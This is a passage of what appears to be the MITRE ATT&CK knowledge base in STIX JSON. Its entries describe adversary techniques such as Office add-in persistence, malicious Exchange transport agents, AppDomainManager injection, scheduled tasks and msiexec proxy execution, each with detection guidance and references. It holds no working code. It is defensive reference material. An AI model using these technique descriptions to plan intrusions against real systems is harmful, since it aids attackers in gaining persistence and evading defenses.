"https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"}, {"source_name": "Microsoft Access Control Lists May 2018", "description": "M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists"}, {"source_name": "Microsoft DACL May 2018", "description": "Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.", "url": "https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces"}, {"source_name": "EventTracker File Permissions Feb 2014", "description": "Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.", "url": "https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Add-ins", "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "created": "2019-11-07T19:52:52.801Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/006", "external_id": "T1137.006"}, {"source_name": "Microsoft Office Add-ins", "description": "Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.", "url": "https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460"}, {"source_name": "MRWLabs Office Persistence Add-ins", "description": "Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.", "url": "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/"}, {"source_name": "FireEye Mail CDS 2018", "description": "Caban, D. and Hirani, M. (2018, October 3). You\u2019ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.", "url": "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf"}, {"source_name": "GlobalDotName Jun 2019", "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.", "url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Transport Agent", "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ESET", "Christoffer Str\u00f6mblad"], "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["SYSTEM", "Administrator", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "created": "2019-12-12T15:08:20.972Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505/002", "external_id": "T1505.002"}, {"source_name": "Microsoft TransportAgent Jun 2016", "description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.", "url": "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help"}, {"source_name": "ESET LightNeuron May 2019", "description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.", "url": "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:03.395Z", "name": "Transient Cyber Asset", "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. \n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", "created": "2021-10-14T15:25:32.143Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0864", "external_id": "T0864"}, {"source_name": "North American Electric Reliability Corporation June 2021", "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "System Information Discovery", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Maril Vernon @shewhohacks", "Praetorian", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather detailed system information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS", "Network"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "created": "2017-05-31T21:31:04.307Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1082", "external_id": "T1082"}, {"source_name": "Amazon Describe Instance", "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.", "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"}, {"source_name": "Google Instances Resource", "description": "Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.", "url": "https://cloud.google.com/compute/docs/reference/rest/v1/instances"}, {"source_name": "Microsoft Virutal Machine API", "description": "Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.", "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}, {"source_name": "OSX.FairyTale", "description": "Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.", "url": "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-17T22:52:23.454Z", "name": "Application Layer Protocol", "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Duane Michael"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "created": "2017-05-31T21:30:56.776Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071", "external_id": "T1071"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Mandiant APT29 Eye Spy Email Nov 22", "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.", "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-28T15:44:25.342Z", "name": "AppDomainManager", "description": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Thomas B", "Ivy Drexel"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "created": "2024-03-28T15:36:34.141Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/014", "external_id": "T1574.014"}, {"source_name": "PenTestLabs AppDomainManagerInject", "description": "Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024.", "url": "https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/"}, {"source_name": "Microsoft App Domains", "description": "Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024.", "url": "https://learn.microsoft.com/dotnet/framework/app-domains/application-domains"}, {"source_name": "PwC Yellow Liderc", "description": "PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.", "url": "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html"}, {"source_name": "Rapid7 AppDomain Manager Injection", "description": "Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.", "url": "https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Remote Data Staging", "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "created": "2020-03-13T21:14:58.206Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1074/002", "external_id": "T1074.002"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-16T17:51:35.865Z", "name": "Additional Container Cluster Roles", "description": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)\n \nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. \n\nNote that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", "created": "2023-07-14T14:01:50.806Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/006", "external_id": "T1098.006"}, {"source_name": "AWS EKS IAM Roles for Service Accounts", "description": "Amazon Web Services. (n.d.). IAM roles for service accounts. Retrieved July 14, 2023.", "url": "https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html"}, {"source_name": "Google Cloud Kubernetes IAM", "description": "Google Cloud. (n.d.). Create IAM policies. Retrieved July 14, 2023.", "url": "https://cloud.google.com/kubernetes-engine/docs/how-to/iam"}, {"source_name": "Kuberentes ABAC", "description": "Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July 14, 2023.", "url": "https://kubernetes.io/docs/reference/access-authn-authz/abac/"}, {"source_name": "Kubernetes RBAC", "description": "Kubernetes. (n.d.). Role Based Access Control Good Practices. Retrieved March 8, 2023.", "url": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/"}, {"source_name": "Aquasec Kubernetes Attack 2023", "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.", "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters"}, {"source_name": "Microsoft Azure Kubernetes Service Service Accounts", "description": "Microsoft Azure. (2023, April 28). Access and identity options for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.", "url": "https://learn.microsoft.com/en-us/azure/aks/concepts-identity"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-01T15:29:46.832Z", "name": "Scheduled Task/Job", "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Prashant Verma, Paladion", "Leo Loobeek, @leoloobeek", "Travis Smith, Tripwire", "Alain Homewood, Insomnia Security", "Andrew Northern, @ex_raritas", "Bryan Campbell, @bry_campbell", "Zachary Abzug, @ZackDoesML", "Selena Larson, @selenalarson"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Containers"], "x_mitre_version": "2.3", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["SYSTEM", "Administrator", "User"], "x_mitre_permissions_required": ["Administrator", "SYSTEM", "User"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "created": "2017-05-31T21:30:46.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053", "external_id": "T1053"}, {"source_name": "ProofPoint Serpent", "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"}, {"source_name": "TechNet Task Scheduler Security", "description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc785125.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Msiexec", "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ziv Kaspersky, Cymptom", "Alexandros Pappas"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "created": "2020-01-24T14:38:49.266Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/007", "external_id": "T1218.007"}, {"source_name": "TrendMicro Msiexec Feb 2018", "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"}, {"source_name": "LOLBAS Msiexec", "description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"}, {"source_name": "Microsoft msiexec", "description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec"}, {"source_name": "Microsoft AlwaysInstallElevated 2018", "description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.", "url": 